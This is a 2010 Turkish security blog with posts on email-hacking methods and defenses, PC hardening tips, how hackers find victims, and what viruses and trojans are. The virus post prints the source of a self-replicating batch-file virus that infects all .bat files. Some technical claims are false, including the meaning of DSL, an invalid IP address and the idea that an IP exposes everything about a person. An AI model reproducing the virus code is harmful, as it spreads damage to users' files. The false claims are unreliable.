Follow ferdianarcom on Twitter
Şub
22
2010
2

Mail Adresimizi Güvenceye alalım

Mail adresimize hack amaçlı yollanan mail türleri ve bunları nasıl önleyebileceğimizi anlattık.
Çoğu internet kullanıcısının kendine ait bir mail adresi vardır.Tabii mail adresi olunca birde kötü niyetli kişilerden korunma derdi çıkıyor ortaya. Maalesef ki bazı kötü niyetli kişiler mail adresimizi hackleyerek mail adresini farklı amaçlarda kullanabiliyor.

Eğer birisi sizi hacklemek istiyorsa aşağıdaki seçenekleri kullanmak zorundadır ve bu seçeneklere göre sizlere nasıl güvende olursunuz onu anlatacağım.

1- Fake Mail: Fake mail sahte maildir.Yani html’den biraz anlayan herkes fake mail yazabilir.Bu kodlar tümüyle zararsız olup amaç kandırmak ve bu şekilde mail şifrenizi almaktır.

2- Kek Hack: Kek yöntemi kişinin hayal gücüne kalarak yazılan yazıdan başka hiç bir şey değildir.örneğin birisi xyz@xyz.com gibi bir adres alıp size mail adresinizi ve şifrenizi bize gönderin gibi bir yazı yazar sizde gönderirseniz mail adresiniz gider.

3- XSS açığı: XSS açığı bir cookie çalma yöntemidir.Genellikle size bir mail gelir ve içersinde bir link olur sizde tıkladığınız andan itibaren cookieniz hackerın eline düşer.

4.Şifre Kırıcı Kullanmak: Bu yöntem her zaman vardı ve var olacaktır.Belli bir program yazılır ve kişinin isteğine göre wordlist oluşturulur,bu wordlistte karakter eşlemleri sıra ile milyarlarca kelimeden oluşur ve program bu wrodleri deniyerek şifrenizi bulabilir.Ne kadar büyük wordlist oluşturulursa o kadar şansı ve zorluğu artır.Bu programlarla hack yapmak aylarınızı alabilir.

5-Trojan & Keylooger: Bu yazılımlar virüs kodlarıyla oluşturulmaktadır ve bununla hack işlemi yapmak için size gönderilen herhangi bir .exe uzantılı dosyayı almanız yeterli olur.

6- İnternet kafelerden Net’e Bağlanmak: Eğer kafelerden nete bağlanıyorsanız mail hack işleminden her zaman tedirgin olursunuz,bunun için yapılacak pek fazla bir şey yoktur ama genelde kafelerde msn açarken ” Parolamı anımsa veya Oturumumu Otomotik aç” gibi seçenkelere tıklarsanız msn adresiniz kısa zaman içersinde elinizden gidecektir.

7- MSN ‘in açığı: Msn gibi bir iletişim yazılımında bulunabilen açıklar.

——————————————————-

Şimdide gelelim bu 6 mail hackten nasıl kurtulacağız.

1- Fake mail: Fake maille hack genellikle kandırmaya bağlıdır yani msn’in yeniliklerinden faydalanılır veya ‘’sitemizde direk msn,yahoo… vb.” bağlantısı vardır gibi linkler olur ve sizler tıklarsınız, bi bakarsınız ki msn.com’un ana sayfası gibi bir sayfa ama yanılırsınız adres çubuğuna bakarsanız oradaki adresin msn.com gibi değil farklı bir adrestir yani böyle durumlarda öncelikle ”Adres Çubuğuna bakın ve Bu Direk Linkleri Kullanmayın!

2-Kek Hack yöntemi: Öncelikle mailin geldiği adresi kontrol edin.Bu yöntemde genellikle gerçeğe yakın mail adresleri kullanılır tek yapmanız gereken dikkat ve her olup olmadık yere kullanıcı adı ve şifrenizi yazmamanız.

3-XSS Açığı: Bu açıktan korunmak için;Size hangi adresten olursa olsun gelen maillerde bulunan linklere direk tıklamayınız.O linkleri kopyalayıp adres çubuğundan bağlanmayı denerseniz cookieniz o siteye düşmez ve bu açıktan yararlanmak isteyen kişi avcunu yalar.Ama hiç tıklamamanızı tavsiye ederim!

4-Şifre Kırıcı: Böyle programları kullanan kişiler msn hackten fazla anlamayan kişilerdir.Bırakın sizi hacklemeye çalışsın sizin yapmanız gereken tek şey.Mail şifrenizi 1 ay da bir değiştirmek ve şifrenizi ”harf rakam karakter…vb” şeklinde oluşturmaktır.örnek: abc_&123

5-Trojen & Keyloger: Bu şekilde hack yapılması için öncelikle size bir dosyayı yedirmesi gerektirmektedir.Aslında bundanda korunmak kolaydır.Öncelikle sağlam bir anti-virüs yükleyin bilgisayarınıza ve tanımadığınız kişilerden her ne olursa olsun dosya kabul etmeyin edersenizde taratmayı unutmayın.

6-Cafelerden Net’e Bağlanmak: Bu bir yöntem değil uyanıkların yapabileceği iştir.Her ne olursa olsun, Otomotik oturum açmayın ve parolanızı hatırlatmayın! bitti bu kadar.Hııı unutmadan bazı cafe sahipleri adilik yapabilir bilgisayarlarda keyloger çalıştırabilir.Buna yapabilecek bir şey yok!

7-MSN Açıkları: Şimdilik benimde bildiğim açık şu: mutlaka uygulayınız:

MSN’i açın->>Araçlar->>Seçenekler->>Sol taraftan GENEL’ i seçin

ve ” Windowsda oturum açtığımda otomotik olarak oturum aç” seçeneğinde click varsa iptal edin çünkü bu açıkta xss açığına benzer ve cookienizin bazı sitelere düşmesini sağlarsınız.

Şub
22
2010
2

PC saldırılarına karşı 20 önlem

Birgün bilgisayarımızı açtığımızda bir misafirimizin bizi ziyaret ettiğini görmek hiçbir kullanıcı istemez.
Bilgisayarımızı olası saldırılardan korumak için alabileceğimiz 20 güvenlik önlemini sıralayalım.Daha güvenli bir bilgisayara sahip olmak için tüm açık kapıları kapatmalıyız.Ne kadar çok açık kapı bırakırsak tehdit o kadar artacaktır.Bunu bilincinde olmalıyız ve bazı güvenlik önlemlerini almalıyız.

Açık kapıları kapatarak kötü niyetli kişilerin bilgisayarımıza ulaşmasını engelleyebiliriz.İşte güvenlik için bizim 20 önerimiz;

1. Şifre:

İlk önce bilgisayarımıza bir şifre koymalıyız.Bilgisayarımıza koyduğumuz şifre sayesinde amatörcede olsa gelecek saldırılardan bilgisayarımızı korumuş oluruz.Bilgisayarımızda basit bir şifre oluşturmak için Denetim Masası kısmındaki Kullanıcı Hesaplarını açmamız ve buradan Yönetici Hesabını tıklamamız yeterli olacaktır.Tabii ki şifremizi sürekli hatırlayabileceğimiz bir şekilde oluşturmamız gerekir

2. Standart Şifreleri Değiştirin:

Bilgisayarımıza yüklediğimiz birçok program kendi bünyesinde otomatik olarak şifreleme yapar.Fakat bu şifreler standarttır ve hiçte kullanışlı değildir.Bilgisayarımıza yüklediğimiz bir prpgram veya parça sonrası mutlaka standart düzendeki şifreleri değiştirmeliyiz.Bu sayede yapılan bir saldırıda saldırıyı yapan kişinin standart şifreyi girip bilgisayarımıza ulaşmasını engelleriz.

3.Kullanılmayan Hesapları Kaldırın:

Bilgisayarımızda bir yönetici hesabı açılmış ve şifresi değiştirilmiş olsa bile sistem yöneticisi dışındaki hesapların aktif olması mümkündür. Bu kısıtlı kullanıcılara ait hesap ve şifreler çok daha rahat aşılabilmekte ve şifreleri daha kolay kırılabilmektedir. Bu sebeple eğer ki bilgisayarı sadece siz kullanıyorsanız bu tarz ek hesapları kaldırmakta fayda var. Bu tarz ziyaretçi hesaplarının Windows’umuzda olup olmadığını Denetim Masasında yer alan Kullanıcı Hesaplarından kontrol edip gerekiyorsa kaldırabiliriz.

4. Portlara Bir Göz Atın:

Windows Firewall sayesinde birçok saldırı engellenebilir. Ama bazı programlar genelde güncelleme yapabilmek amacıyla bu güvenlik duvarındaki bazı portları açarlar. Bu portların açılmasıyla beraber bilgisayarımıza girilmesi için bir açık vermiş oluruz. Denetim Masasında yer alan Güvenlik Duvarı bölümünden hangi programlar için bilgisayarımıza giriş izni verildiğine bir göz atmakta fayda var. Kurduğumuz ve emin olduğumuz programlar oyunlar haricinde burada görünen ve ne olduğunu bilmediğimiz programları iptal etmeliyiz.

5.Güncel Şİfreleme:

Bilgisayarımızdaki şifreyi değiştirmiş olsak bile düzenli olarak şifremizde değişiklik yapmazsak şifremizi öğrenmiş biri her zaman için bilgisayarımızı ziyaret edebilir. Bu sebeple bilgisayar bağlantı şifrelerimizi düzenli bir şekilde değişmekte fayda var.

Bu işlemi sürekli hale getirmek için Bilgisayarım’a sağ tıklayıp Yönet kısmını açmamız gerek. Açılan ekranda Yerel Kullanıcılar ve Gruplar başlığının altında bulunan Kullanıcılar kısmına girmeliyiz. Burada karşımıza çıkan kullanıcı listesinden aktif olan kullanıcıyı seçip sağ tıklayıp özellikleri seçersek karşımıza yeni bir ekran çıkar. Bu ekranda otomatik olarak işaretli gelen Parola her zaman geçerli olsun’un yanındaki işareti kaldırmamız (3. seçenek) ve ilk seçenek olan Kullanıcı bir sonraki oturum açışında parolayı değiştirmeli’yi seçmemiz yeterli olacaktır.

6.Otomatik Hatırlatmalardan Uzak Durun:

Çeşitli web sayfalarında dolaşırken kişisel şifrelerimizi girmemiz gerekebilir. Bu tarz zorunluluklarda kullandığımız program otomatik olarak bir dahaki sefere kullanıcı adını ve şifreyi otomatik gireyim mi diye sorar. Unutmamak lazım ki bu tarz otomatik hatırlamalar bilgisayarımızda bir yerlere kullanıcı adımızı ve şifremizi not etmek anlamına gelir. Zararlı amaçla bilgisayarımıza saldıran kişiler bunları bularak hesaplarınızı ele geçirebilir. Bu yüzden her ne kadar pratik gibi gözükse de bu tarz otomatik hatırlamalardan uzak durup mümkün olduğunca kullanıcı adımızı ve şifremizi elle girmekte fayda var.

7. Kablosuz Modemlere Dikkat:

Eğer ki İnternet’e bağlanmak için kablosuz modem kullanıyorsak modemle beraber gelen kitapçığı inceleyip mutlaka şifre koymamız gereli. Bu sayede başkalarının bizim modemimize bağlanıp İnternet’e çıkış yapmalarını engelleyebiliriz. Çoğu kişinin atladığı bu adım aslında güvenliğimiz açısından çok çok önemli!

8.Her e-Postayı Açmayın:

Aldığımız tüm önlemler genelde dışarıdan yapılan saldırıları durdurmak içindir. Genel anlamda aktif bir kullanıcıyı durdurmayı pek hedeflemez. Bu sebeple tanımadığımız bir insandan gelen e-postayı açıp içerisinde bulunan programı aktif edersek aldığımız önlemler boşa gidecektir. Bundan kurtulmanın en kolay yolu tanımadığımız insanlardan gelen e-postaları açmadan silmektir. Birçok e-posta gönderip alan program veya Web sayfası bu tarz gelen istenmeyen e-postalara karşı önlem almış durumdadır. Bu önlemleri aktif konuma geçirmek faydalı olacaktır.

9.Güncellemeleri Takip Etmek, Kullanmak:

Birçok açığı kapatmanın en iyi yolu firmaların programları için yaptığı güncellemeleri kurmaktır. Bu güncellemeler sayesinde programlarda sonradan fark edilen açıkların neredeyse hepsi kapatılır. Bilgisayarımızda kurulu olan programların güncellemelerini haftada bir kez bile olsa kontrol etmek yahut programda desteği varsa otomatik güncellemeleri aktif etmek oldukça tatminkâr çözümlerden birisidir.

10.Güvenlik Programları:

Windows içerisinde otomatik olarak gelen bir güvenlik duvarı bulunmasına karşın bu genel anlamda yeterli değildir. Birçok insanın evde ya da iş yerinde bu standart güvenlik duvarını kullandığını bilen saldırganlar bu standart güvenlik duvarı üzerinde daha fazla açık aramaya vakit ayırmışlardır. Bundan kurtulmanın yolu ücretsiz ya da ücretli olan daha kaliteli bir güvenlik duvarı programı kurmaktır.

11.Paylaşım Klasörleri:

Genelde bilgisayarımızda bulunan birçok dosya paylaşıma açıktır. Bu tarz bir paylaşıma ihtiyaç duymuyorsak paylaşımları tamamen iptal etmekte fayda var. En azından paylaşmamız gereken bir klasör varsa bu klasör haricindekileri iptal etmek ve sadece bu klasörü paylaşmak sayesinde saldırganlardan kurtulabiliriz. Bir saldırgan rastgele bilgisayar taraması esnasında açık bulduğu bir bilgisayarın tamamen elinin altında olması sadece bir klasörün açık olmasından çok daha fazla ilgisini çekecektir.

12.e-Posta Kontrolü:

E-posta kontrollerini bir program aracılığı ile yapmakta her zaman için fayda var. Web tabanlı e-posta sayfaları her ne kadar yüksek önlemler almış olsa da spam e-postaların açılmasıyla kullanıcı farkında olmadan bilgilerini ortaya çıkartmış olur. Bu tarz olaylardan kurtulmanın en sağlıklı yolu e-posta adresimizi aldığımız yer destek veriyorsa Outlook Express gibi bir program aracılığıyla e-postaları kontrol etmektir.

13.Güvenli Download:

Bir programı denemek için bilgisayarımıza indirmemiz gerekiyorsa mutlaka bunu programın resmi sayfasından yapmak gerekir. İndirmeyi düşündüğümüz bir programı herhangi bir sayfadan çekmek zaman zaman sorunlara yol açabilir. Programın yasal satıcısından programı temin etmek mümkün değilse bile bu tarz deneme sürümlerini en azından güvenilir ve bilindik sayfalardan yapmakta fayda var.

14.Kablosuz Ağ Güvenliği:

Kablosuz ağı korumanın etkin yollarından biri de uygun bir Mac adresine erişim sağlama izni vermektir. Bu olay her ne kadar saldırıları %100 durduramasa da bilgisayarınızla uğraşmaya kalkan saldırganı önemli oranda yıldıracak ve başka hedeflere yönelmesini sağlayacaktır.

15.İnternet Aramaları:

Araştırmak istediğiniz konularda sayfalara ulaşımı mümkünse doğrudan adresi yazarak yapın. Google gibi arama motorlarıyla ulaşılan sayfalarda büyük oranda bir sorun olmasa da ulaşılan bir sayfadan başka bir sayfaya geçişlerde istenmeyen sorunlarla karşılaşmak mümkün.

16.E-Postalara Dikkat:

Aynı şekilde size gelen bir e-postada sizin bildiğiniz bir web sayfasına link varsa mümkün olduğunca gelen e-postadaki linke tıklamak yerine elle yazarak o sayfaya ulaşın. Birçok dolandırıcılık olayında bankaların açık arttırma sitelerinin çevrimiçi oyunların kullanıcı hesaplarının aktif edildiği sayfalar birebir taklit edilerek e-postada gönderilen link sayesinde yanlış yerlere gitmemiz sağlanıyor. Doğrudan adres yazamıyorsak ve linke tıklamamız gerekiyorsa bile kullanıcı adı hesabı girmeden önce açılan sayfanın vardığı noktaya bakmakta fayda var.

17.Bios’a Şİfre Koyalım:

Dış saldırıların yanı sıra iç saldırılardan korunmanın bir yolu da Bios şifresi kullanmaktır. Bu sebeple Bios’umza koyacağımız şifre sayesinde Bios’a girilmesi ya da makine resetlenip baştan başlatılması durumunda şifre sorması sağlanabilir.

18.Online Virüs Taraması:

Bilgisayarlarımızda bir virüs programı olması her zaman için güvenlidir ama bazı programlar kullandığımız virüs programlarını atlatmak için o programlara zarar verebilir. Bu zararlar sonrası virüs programımız her ne kadar çalışıyor gibi gözükse de aslında pasif konumdadır. Bu tür bir olasılığa karşın arada sırada online hizmet veren virüs tarama sayfalarından makinemizi taratmak iyi bir seçenek olabilir.

19.Ctrl+Alt+Del:

Bilgisayarınızda bir tuhaflık olduğuna inanıyorsanız Ctrl+Alt+Delete tuşlarına basarak Task Manager’dan çalışan programların neler olduğuna bakmak faydalı olabilir. Standart çalışan programlar dışında şüphe çeken bazı programları bu sayede görebiliriz.

20.Wi-Fi Mesafesini Kısaltın:

Eğer ki kablosuz modeminiz destek veriyorsa Wi-Fi mesafesini kısaltıp uzak noktalardan erişimi engellemek de korunma adına bir parça etkili olabilecek yöntemlerden biridir.

Şub
22
2010
2

Hackerlar nasıl avlanır?

Hackerların nasıl kurban seçtiği, kurbanını nasıl ve ne kullanarak bulduğunu hiç merak ettiniz mi?
Hackerların ve bazı kötü niyetli kişilerin bizi nasıl bulduklarını yada biz Internet’ te masum masum dolaşırken yada muhabbet odalarının birinde tatlı tatlı
muhabbet ederken, bu kötü niyetli kişilerin bilgisayarlarımıza veya
sistemlerimize nasil sızdıklarını hep merak etmişizdir, değil mi? Gazete, dergi yada TV haberlerinde hackerlar şu siteyi hack etmişler, çeşitli ülkelerden bilmem kaç adet siteyi çökertmişler benzeri haberleri okuduğumuzda yada duyduğumuzda, “Bu işi nasıl beceriyorlar?” diye kendi kendimize sorular sorduğumuz olmuştur.

Bilgisayarlarımıza Virüs, Truva Atı ve Solucanlar nasıl bulaşıyor? Bu virüs denilen şeyler gerçek hayatta, vucudumuzu hasta eden virüsler gibi canlı organizmalarmı ki bilgisayarımıza da bulaşınca onlarıda elden etekten ediyorlar? Bu hacker yada kötü
amaçlı kişiler tüm bu kötülüklerini bize neden yapıyorlar? Bizden ne istiyorlar? Amaçları gerçekten ne? Ne yapmak istiyorlar? Her masum bilgisayar kullanıcısı (pc user) ve Internet gezgincisini kahretmek mi amaçları? Bu ve buna benzer bir dizi soruyu hep kendi kendimize sormuşuzdur.Hadi şimdi bunlara cevaplar üretmeye çalışalım…

Tanımlar

Herşeyden önce “kötü niyetli” olarak tanımladığımız kişilerin tanımını yapmalıyız. “Kötü niyet’ten kasıt, yapılanlanların öyle yada böyle bazı masum kişileri zarara uğratmasıdır. Birileri üzülüyor ve zarara uğruyorsa amaç ne olursa olsun buna “iyi niyet” denemez, ama buna rağmen bu “kötü niyetli” kişilerinde bu işi yapmalarının kendilerine göre belli bir amaçları vardır. Önce belli tanımları yapalım, ne nedir, kim kimdir
belirleyelimki konumuzu anlatırken herşey yerli yerine otursun;

Hacker: Programlama dillerinden (programming languages) en az birini bilen, işletim
sistemlerinin nasıl işlediginden anlayan ve iletişim sistemlerinin ( TCP/IP gibi, nelerden oluştugunu bilen kötü niyetli kişi yada kişiler.

Cracker: Programlama dillerinden en az birini bilen, işletim
sistemlerinin (operating systems) nasıl işlediginden anlayan, iletişim sistemlerinin TCP/IP gibi, nelerden oluştugunu bilen, şifreleme teknolojilerinden haberdar ve hackleme programlarinin nasil kullanildiğını ve yazıldığını çok iyi bilen kötü niyetli kişi yada kişiler.

Lamer: Aslında hackleme konusunda yetenekli ve bilgi olamayan ama kendisini hacker zannedip UYA’ (Uzaktan Yönetim Araçları, RATs) ları kullanmaktan başka bir iş yapmayan kişi yada kişiler.Program yazamaz basit ve herkes tarafından kullanılabilecek programlarla işini görür

Intruder: Bunun tanımı hackerin tanımı ile benzerlik arzeder, bir farkı vardır, bu tip kişiler
kendilerinin sadece bilgi peşinde olduklarını savunurlar.

Kötü kodlama: Virüs, Truva Atı, Solucan (Worm) yada UYA, Uzaktan Yönetim Araçları [RATs, (Remote
Administration Tools) / TMTs (Remote Monitoring Tools) bilgisayarlarımızda zarara, yıkıma ve çökmelere yol açan, önemli (confidential) ve mahrem bilgilerimizin (privacy) çalınmasını yada kurcalanmasını sağlayan yazılım yada programlardan başka bir şey değildir.

Intrusion: başkalarına ait sistem yada bilgisayarlara, yetki dışında sızılma (penetration) eylemidir.

Bulaşma Ortamları

Sanal Dünya’ da ne kadar bilgisayar yada sistemin virüs ve benzeri kodlamalardan etkilendiği yada ne
kadarına kötü kodlama bulaştığını hiç merak ettikmi? Yaklaşık 50 milyon kadar. Bunu nasıl
belirliyorlar? Sanırım bu Symantec, McAfee gibi virüs takip ve denetleme firmalarının işi. Bulaşmanın
bu boyutlara ulaşmasının başılıca nedeni, IRC, mIRC ve IQC’ nun çok yaygın olarak kullanılıyor olması.
Sıradan bir bilgisayar kullanıcısı, ICQ ortamında ne gibi risklerle yüzyüze olduğundan hiç haberdar
değildir. Kullandığımız ICQ Hesap Numaramız (Account Number) IP Numaramızı herkese açık hale yani
görülebilir hale sokar. ICQ’ unun IP Numarasını genele göstermeme seçeneğini işaretlesek bile bu pek
işe yaramaz. Yaramaz çünkü IP Numarası koklama programları (IP Sniffer programs) vardır ve bu
programlarla rahatlıkla ICQ ortamında IP numaralarımız tesbit edilebilir. Nedir bu IP Numarası? IP
Numaramiz, bilgisayar yada sistemimizin Internet Protokol Adresidir (Internet Protokol Address).
Nasıl yani, yine anlamadım mı dediniz? Şöyle örnek verelim; IP Numaramız kimliğimizdeki (Nüfus
Cüzdanı) seri numarası gibi bir numaradır. Internet’ te bilgisayarlar bu numaralarla tanınırlar.
Kimliğimizdeki ismimizde bilgisayarlardaki DNS (Domain Name Systems) gibidir. Kimliğimizdeki numara
ve ismimiz sabittir. Ama bu bilgisayarlarımızda durum biraz farklılık arzeder.

IP Numaraları

Ne demiştik, IP Numaralarımız bilgisayarımızın Internet Protokol Adresidir. IP Numaralarımız
kullandığımız ISS (ISP) tarafından bizi yani bilgisayarımızı tanımlamak için verilir. Her
bağlandığımızda bize ayrı bir IP Numarası atanır. Yani klasik ve yavaş akan modemli bağlanti
yönteminde atanan IP Numaraları değişkendir (not static). Ama DSL (Dynamic Subscriber
Lines=Dinamik Abone Hatları) ve Kablolu (cable connection) Bağlantıda durum farklıdır. Atanan IP
Numaraları sabittir (static). Biz bu numarayı kimlik numaramızla karşılaştırmıştık. Aslında Türkiye’ de
olmayan ABD ve Avrupa’ da kullanılan Sosyal Güvenlik Kimlik Numaraları vardır, bu daha çok ona
benzer. Bu numara ile ilgili kişi hakkında herşey elde edilebilir. İşte bu Sosyal Güvenlik Kimlik numarası
gibi olan IP Numaramızı ele geçiren kişiler, isterlerse bizimle ilgili herşeyi öğrenebilirler. elde edebilir.
Eğer haclker kurnaz (tricky) bir kişiyse ve uğraşırsa bize ait bir çok gizli ve önemli bilgileri elde
edebilir.

Mesela 127.0.0.1. gibi bir IP Numarası bizim yerel hostumuzun numarasıdır. 126.123.456.789 gibi bir
numarada bir IP adresidir. Bunları çevirme yolları vardır ve bu yolla bizim host adresimize ulaşılır.

Şimdi bazı kötü niyetli kişilerin neden bilgisayarlarımıza sızmak yada Truva Atı vb UYA’ ları
göndermek istediklerini kavrayabildikmi? ya bilgisayarımıza komple hükmetmek (completely command)
istiyorlar yada zarar ve yıkım yaratmak istiyorlar. Truva Atı ve Virsülerin aslında ilk amacı budur.

Truva Atı Bulaşmış Bilgisayarımızda Neler Olabilir?

Bir çok Truva Atı yaga UYA programları çalıştırılabilir (executable) özelliği olan .exe uzantılı çok
küçük dosyalardır (files). Boyutları oldukça küçüktür, 15 Kb, 30Kb, 80 Kb gibi. Küçük olmalarının
sebebi, insanlar 100Kb’ ın üzerindeki dosyaları pek yüklemek istemezlermiş. Bu çalıştırılabilir dosyalara
tıklandığında pek bir şey olmaz. Ancak geri planda bilgisayarımızda gizli bir port açar.
Gizli olduğu için ne olduğunu anlayamayız. Dosyayı açmamızın hemen ardından, bilgisayarımızın
denetimi, bize bu Truva Atı’ nı yollayan kişinin eline geçer. Artık onun bilgisayarımıza tam erişim hakkı
vardır. Bilgisayarımıza yerleştirilen Truva Atı bir istemci vazifesi görmeye başlar. Kendisini
gönderene ne isterse onu yapma olanakları sağlar.

Nedir bunlar?

1.) Sifrelerimiz çalmak
2.) Dizin erişimi
3.) Bilgisayarımızı açıp kapatma
4.) Keylogging
5.) Bilgisayarımıza ekran koruyucu yerlestirme
6.) CD-Rom sürücümüzü açıp kapatma
7.) Ekrana görüntü yerleştirme
8.) Fare hareketlerini değiştirme
9.) Herhangi bir programı devreye sokma
10.) Email programımızı kullanarak mesaj gönderme
11.) Portlarımızı yeniden yöndlendirme
12.) Faremizin tüm denetimini elimizden alma ,

Ve sayamayacağımız kadar başka şeyler, artık kötü niyetli kişinin hayal gücüne kalmış.
Yukarıda saydıklarımız, bilgisayarımıza bir Truva Atı bulaştıktan sonra, onu denetleyen kişinin
yapabileceklerine bir kaç örnekten ibarettir ve bunlarla sınırlı değildir. Bir hacker yada lamer’ in
bilgisayarımıza Truva Atı yerleştirme çabasının ilk adımı bize ait IP Numarasını elde etmektir.
Bununda nasıl elde edildiğini yukarıda anlatmıştık.

Şub
22
2010
2

Nedir şu “Virüs” denen şey

Tüm bilgisayar kullanıcılarının kabusu olan virüs nedir ?.Nasıl yazılır ?.Nasıl Çoğalır ? Hepsi Bu yazıda
Virüs Nedir ?

Virüsler bilgisayar ortamlarına kaçak olarak giren küçük programlardır sisteme girdiklerinde coğalırlar ve tüm sistemi ele geçirirler virüsler kimilerine göre canlıdır çünkü yapay zekaları oldukları ve üreme iç güdüleri oldugundan canlı oldukları düşünülür
tabi bu tartışılır biz bu yazıda virüslerden nasıl korunuruz veya nasıl kurtuluruz.konuya girmeden önce virüsler hakında bilgi edinelim böylece bulaşma yolarınıda ögrenebiliriz.

Herhangi bir yazılımın virüs olabilmesi için en az şu kriterleri saglaması gerklidir:
1.çalıştırılabilir olmalı
2.kendi kendilerine cogalması
3.diger çalışabilir opjeleri kendi kolanisine çevirebilmesi
Bir bilgisayar virüsü yazmak çok kolaydır aşagıda verdigimiz virüsün
kaynak kodu (batch file virüs)ün kaynak kodudur bu yazılım ms-dos işletim sisteminin bacth file yazılmıştır
bu bir virüs yazılımıdır yalnızca virüslerin komutlarından oluşan bir yazılımı oldugunu göstermek amacıyla verilmiştir
lütfen şaka amaçlada olsa bu yazılımı kimseye uygulamayınız zaten her virüs koruma programı
tanıya bilmekte eski bir virüs yazılımıdır.

Batch File Virüs Kaynak Kodu

echo The Batch Filr Virus (BFT.BAT)
echo Osborne/McGraw-Hill “Computer Virıs Handbook“ kitabından
echo -Bu purogram, bilgisayar virislerinin nasıl çalıştıklarını ve
echo bir bilgisayar virisinün ne kadar kolay oldugunu
echo gostermektedir.
echo -Bulunulan dizin:
cd
echo -
echo UYARI! BU PROGRAM, BULUNULAN DİZİNDEKİ BÜTÜN .BAT DOSYALARINA
echo BULAŞIR. BULAŞTIGI .BAT DOSYALARI DİGER .BAT DOSYALARINI DA
echo ETKİLER! BU PROGRAMI ÇALIŞTIRMAKLA BÜTÜN .BAT DOSYALARINIZI
echo BOZABİLİRSİNİZ!
echo -
echo Lütfen bu programı çalıştırmadan önce bütün .BAT dosyalarınızı
echoyedekleyiniz. Eger nasıl yedekleme yapılacagını bilmiyorsanız
echo bu programı çalıştırmayın.
echo -
echo Yukardaki açıklamaları anladıysanız devam etmek için
echo herhangi bir tuşa; programdan çıkmak için ^C tuşlarına basınız.
pause > nul
cls
echo Bulunulan dizin
cd
echo Dizindeki bütün .BAT dosyalarına bulaşıyorum…
ctty nul
for % %f in (*.bat) do copy % % f + bfv.bat
ctty con
cls
echo Bu dizindeki bütün .BAT dosyalarına Batch File Virüsü
echo bulaşmıştır. Bu virüsü temizlemek için yedeklediginiz .BAT
echo dosyalarını yerlerine kopyalayınız.

Şimdi virüs çeşitlerini sıralayalım

Kullandıkları teknikler çok çeşitli olsa da, virüsler pratikte kabaca Dosya ve Boot virüsleri olarak ikiye ayrılırlar. Virüs deyince genelde akla ilk gelen dosya virüsleridir. Ama sık rastlanan birçok virüsün boot virüsü olduğunu da hatırlatmakta fayda var. Bir Cansu’yu, Crazy Boot’u, eskilerden Ping-Pong’u kim unutabilir ki?
Boot Virüsleri. Disketlerin ve sabit disklerin boot sektörlerine yerleşirler. Bilgisayar açıldığında veya sıfırlandığında (‘reset’lendiğinde) disketin veya sabit diskin boot sektöründeki yükleyici program otomatik olarak çalıştırılır. Daha sonra işletim sistemi yüklenir ve bilgisayar normal kullanıma başlanır. Boot virüsleri, boot sektöründeki yükleme programında değişiklik yaparak kendilerini otomatikman çalıştırırlar. Böylece aktif hale gelirler ve bilgisayar kapatılana kadar bulaşmaya devam ederler.

Dosya Virüsleri. Dosya virüsleri genelde virüs deyince akla gelen virüs türüdür. Bunlar birer asalak gibi kendilerini programın sonuna eklerler. Programın başında da değişiklik yaparak, program çalıştırıldığında ilk önce kendileri çalışırlar. RAM belleğe bir TSR gibi yerleşirler ve bilgisayar kapatılana kadar bulaşmaya devam ederler. Genelde EXE ve COM’lara bulaşırlar. Bazılarının SYS, OVL ve BIN gibi program kodu dosyalarına bulaştığı da görülmüştür. Çoğu yalnızca çalıştırılan program dosyalarına bulaşmakla birlikte, Yandan Çarklı virüsü gibi olanları çalıştırılmayanlara da bulaşırlar.

Virüsümsüler. Virüslere benzeyen fakat virüs olmayan birçok program türü vardır. Bunların ortak özelliği bilgimiz dışında çalışmalarıdır. Örneğin bombalar; bir program yazılırken içine konur. Belli bir zamanda veya bazı şartların oluşmasına bakarak bilgisayar sistemine zarar verirler. Bombaların benzeri truva atlarıdır. Bunlar da programlara yerleştirilirler ve belli koşullar gerçekleştiğinde veya bir koşula bağlı olmaksızın daha ilk çalıştırılmada zarar verirler. Truva atları daha yaygın programlara yerleştirilirler. Ne bombalar ne de truva atları bulaşamazlar. Bu yüzden virüs değillerdir. Diğer “virüsümsüler”, networklerde kullanıcı şifrelerini öğrenmek için kullanılırlar. Öğrendikleri şifreleri sahiplerine bildirirler. Bunlara bukalemun adı verilir.

Turuva atı (trojan)

Özellikle güvenliği sadece kullananın becerisine kalmış kişisel
bilgisayarlara karşı kullanılan ve uzaktan erişim olanağı sağlayan
programlardır Trojanlar. Netbus ve sonrasında türeyen birçok trojan
programının kendine has birçok özelliği var. Tam anlamıyla çalıştırılan
makineyi kontrol altına alabilen trojanlardan işlevleri daha az olanlarına
kadar şu an İnternet üzerinde dolaşan birçok program var. Bunların en meşhuru
: Subseven 2.1. Artık neredeyse kendi başına bir yazılım sektörü oluşan
trojanların kendilerine göre versiyon ve güncellemeleri bile var.
Öyle ki McAffee Network Associates firması,
Subseven için “yüksek risklidir” demecini veriyor.
Aslında kısa sürede gelişen virüs ve trojan piyasasına
kimi virüs programı üreticilerinin içten içe destek verdiği paranoyasındayız.
Düşünsenize camcı, cam kırılmazsa iş yapamaz eğer onun camları indiren bir afacan oğlu yoksa.

Şub
22
2010
2

Çalınan Msn hesabınızı geri alın

Msn hesabınız mı çalındı işte geri almanın yolu.Onlarca kişiyi tekrar eklemekten kurtulun kısa yolla Msn’nizi geri alın
Çalınan MSN, nasıl geri alınır?

Günümüzde internet kullanıp, MSN Messenger hesabına sahip olmayan çok az insan vardır. Bazen iş için, bazen de eğlence için kullandığımız Messenger’a, bu sebepten dolayı pek çok farklı yerde girmek durumda kalıyoruz.

İşte risk burada başlıyor. Kendi bilgisayarınız dışında yabancı yerlerde ne kadar çok Messenger’ı kullanırsanız, şifrenizi çaldırma ihtimaliniz o kadar çok yükselir. Örneğin kullandığınız yabancı bilgisayarda virüs varsa ya da bir internet kafedeyseniz yanınızda oturan kötü niyetli biri, klavye tuşlarınızı izleyerek rahatça şifrenizi çalabilir.

Genelde insanlar şifreleri çalındığında yapılacak bir şey olmadığını düşünüp, yeni bir kullanıcı hesabı açarlar ve o hesap ile devam ederler. Aslında MSN Messenger şifrenizi geri almak çok basittir. Eğer hafızanız bir kuvvetli ve İngilizce biliyorsanız(çevrenizde bilen biride olabilir) birkaç mail atarak şifrenizi geri alabilirsiniz. Fakat attığınız mailler mutlaka İngilizce olmalıdır. Sebebi ise Microsoft’un hala Türkçe destek birimi bulunmaması.

